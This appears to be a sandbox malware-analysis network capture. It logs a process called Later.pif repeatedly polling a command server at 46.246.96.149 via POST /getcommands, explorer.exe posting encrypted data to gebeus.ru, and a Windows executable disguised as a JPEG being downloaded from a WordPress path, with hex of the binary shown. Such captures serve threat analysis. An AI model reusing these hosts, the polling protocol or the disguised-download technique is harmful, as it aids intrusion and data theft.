Jul 15, 2024 06:13:57.085050106 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:56 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ta91scsrsq2urgombuk9pg6kmk; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49790	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:57.216432095 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=31
Jul 15, 2024 06:13:57.902569056 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=qinmoeb4sq9tie22vbkqa3f6j5; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49791	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:58.024775982 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=32
Jul 15, 2024 06:13:58.721822977 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:58 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=i1fkcreqbaue3i822qjbueen3d; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49792	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:58.907531977 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=33
Jul 15, 2024 06:13:59.755383968 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:59 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=qq5uc9svprsodvea8t5k6r2lqt; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49793	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:59.867857933 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=34
Jul 15, 2024 06:14:00.590145111 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:00 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=2ue6uu90cqdkp7du7i1idl2725; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49794	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:00.821029902 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=35
Jul 15, 2024 06:14:01.514548063 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:01 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=a37rf8433fmeh16g21affu093b; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49795	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:01.201127052 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ddxjeoahbwmlur.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: gebeus.ru
Jul 15, 2024 06:14:01.201169014 CEST	275	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 50 cc 88 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuDPTgv9dOo)Qz(>0K>]=:]NsC13>Yq.l>&{o8^+")bB<$(wl\|,V$
Jul 15, 2024 06:14:02.263787031 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:14:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49796	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:01.661642075 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=36
Jul 15, 2024 06:14:02.348503113 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:02 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=kno8e1shm8up2u33o2gf1ktmif; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49797	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:02.461045980 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=37
Jul 15, 2024 06:14:03.174436092 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:03 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=l5rs27r0brdu79hrut6uj9v62i; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49798	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:03.312067032 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=38
Jul 15, 2024 06:14:03.995114088 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:03 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=uailfj60o8kpjbed5dsat1ge00; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49799	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:04.116628885 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=39
Jul 15, 2024 06:14:05.041591883 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:04 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=765gq6l4f8s9nuadkujvpbhlrg; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49800	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:05.164952040 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=40
Jul 15, 2024 06:14:05.895535946 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:05 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=quc264b2og9lt1horl10iu2822; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49801	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:06.007524014 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=41
Jul 15, 2024 06:14:06.788981915 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:06 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=1ekheeu0442mfja0c536n0icbb; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49802	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:06.573015928 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gdirqpperuo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: gebeus.ru
Jul 15, 2024 06:14:06.573030949 CEST	264	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 32 b9 f9 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuo2p(n2Bzaho+\|)]av2Z9W7Y+m[PZTa_Y-i!N2Vk]'rZC{Rl!g)#Yr
Jul 15, 2024 06:14:07.635571957 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:14:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	49803	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:06.914453030 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=42
Jul 15, 2024 06:14:07.621824026 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:07 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=l659ovpp0vph5kktee3pim4u8r; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49804	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:08.149764061 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=43
Jul 15, 2024 06:14:08.525175095 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:08 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=pp7315qmonsv3tk76lefftg3rp; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49805	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:08.665982008 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=44
Jul 15, 2024 06:14:09.352406025 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:09 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=o3ealam6emk7v5alg9sshal69q; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49806	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:09.475162029 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=45
Jul 15, 2024 06:14:10.161021948 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=h6m53uu1f974gofvu9qi6lksa0; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49807	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:14:10.275562048 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=46
Jul 15, 2024 06:14:10.966250896 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:14:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=std3c0lpes9k6nuju6c72ujihm; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49727	185.149.100.242	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-15 04:11:14 UTC	179	OUT	GET /wp-content/images/pic1.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-07-15 04:11:14 UTC	451	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Mon, 22 Jul 2024 04:11:13 GMT content-type: image/jpeg last-modified: Sun, 14 Jul 2024 11:57:22 GMT accept-ranges: bytes content-length: 2074333 date: Mon, 15 Jul 2024 04:11:13 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOnB8
2024-07-15 04:11:14 UTC	16384	IN	Data Raw: 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 28 2e 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 ee c4 ff ff a1 28 2e 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 fe ff ff 75 1e 8b 47 5c 8b 4d e8 69 c0 20 40 00 00 83 7f 0c 02 8d 44 08 08 75 05 83 08 20 eb 03 83 20 df 81 7d 0c 11 01 00 00 75 75 Data Ascii: E}Nt9E}9Et(.Guy9EtMyuk39EQu;\|VUi @Tu@@tyP(.G3A#MEE;t>=uw\Shu9uG\Mi @Du }uu
